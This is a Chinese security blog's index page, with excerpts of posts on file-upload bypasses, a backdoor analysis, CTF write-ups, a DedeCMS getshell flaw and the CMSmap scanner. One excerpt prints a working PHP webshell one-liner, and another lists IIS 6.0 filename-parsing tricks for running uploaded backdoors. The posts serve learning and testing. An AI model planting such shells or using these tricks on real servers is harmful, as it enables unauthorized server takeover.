Fork me on GitHub
摘要: 文件上传漏洞(绕过姿势) 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常 阅读全文
posted @ 2019-01-12 11:55 Jaxjones 阅读(2359) 评论(0) 推荐(0) 编辑
摘要: 一、访问链接 二、下载系统源码后直接放到D盾里扫描,扫到后门文件 三、查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']);?> 1.error_reporting(0); 关闭错误报告 2.$_GET['POST']($_PO 阅读全文
posted @ 2019-01-10 19:46 Jaxjones 阅读(686) 评论(0) 推荐(0) 编辑
摘要: 首次接触,于是初步了解了微信判断内嵌浏览器的方式 从微信6.0开始,其内嵌的浏览器在User Agent字符串中增加了NetType字段用于标识客户端(手机)当前的网络环境,经测试,该字段至少有以下3个取值: NetType/WIFI NetType/2G NetType/3G+ 分别对应于Wifi 阅读全文
posted @ 2019-01-10 16:29 Jaxjones 阅读(428) 评论(0) 推荐(0) 编辑
摘要: ZIP是一种相当简单的分别压缩每个文件的存档格式。分别压缩文件允许不必读取另外的数据而检索独立的文件;理论上,这种格式允许对不同的文件使用不同的算法。不管用何种方法,对这种格式的一个告诫是对于包含很多小文件的时候,存档会明显的比压缩成一个独立的文件(在类Unix系统中一个经典的例子是普通的tar.g 阅读全文
posted @ 2019-01-09 18:25 Jaxjones 阅读(18457) 评论(8) 推荐(0) 编辑
摘要: 在墨者学院做了一道 HTML前端代码分析(暗链) 的题,解题思路如下: 1.开启靶场环境,看起来是一个静态页面 2.按照往常的套路,查看源代码 3.发现链接 http://192.168.1.1/19281028102.php 192.168.1.1貌似是是一个内网地址,无法访问 PS:也有人说是本 阅读全文
posted @ 2019-01-09 15:47 Jaxjones 阅读(2051) 评论(0) 推荐(0) 编辑
摘要: 天网你敢来挑战嘛 格式:ctf{ } 格式:ctf{ } 解题链接: http://ctf5.shiyanbar.com/10/web1/ 打开链接后,嗯,光明正大的放出账号密码,肯定是登不进的,查看源代码 看来是和md5碰撞有关的了, PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进 阅读全文
posted @ 2019-01-06 12:30 Jaxjones 阅读(1490) 评论(0) 推荐(1) 编辑
摘要: 在这个帖子里我把两个洞一起写出来。 第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell。漏洞代码在:/dede/sys_verifies.php 代码如下: else if ($action == 'getfiles') { if(!iss 阅读全文
posted @ 2019-01-05 23:17 Jaxjones 阅读(2316) 评论(0) 推荐(0) 编辑
摘要: CMSmap是一个Python编写的针对开源CMS(内容管理系统)的安全扫描器,它可以自动检测当前国外最流行的CMS的安全漏洞。 CMSmap主要是在一个单一的工具集合了不同类型的CMS的常见的漏洞。CMSmap目前只支持WordPress,Joomla和Drupal。 主要功能 运行截图 暴力破解 阅读全文
posted @ 2019-01-05 16:31 Jaxjones 阅读(5079) 评论(1) 推荐(0) 编辑
摘要: 案例一URL:http://120.24.86.145:8003/代码 其实就是拼接eval可构造如下语句: 到了代码里就是 案例二 URL:http://120.24.86.145:8004/index1.php flag In the variable ! <?php error_reporti 阅读全文
posted @ 2018-12-23 17:06 Jaxjones 阅读(1298) 评论(0) 推荐(0) 编辑
摘要: [+]IIS 6.0 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件。 后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0 阅读全文
posted @ 2018-12-22 10:27 Jaxjones 阅读(1218) 评论(0) 推荐(0) 编辑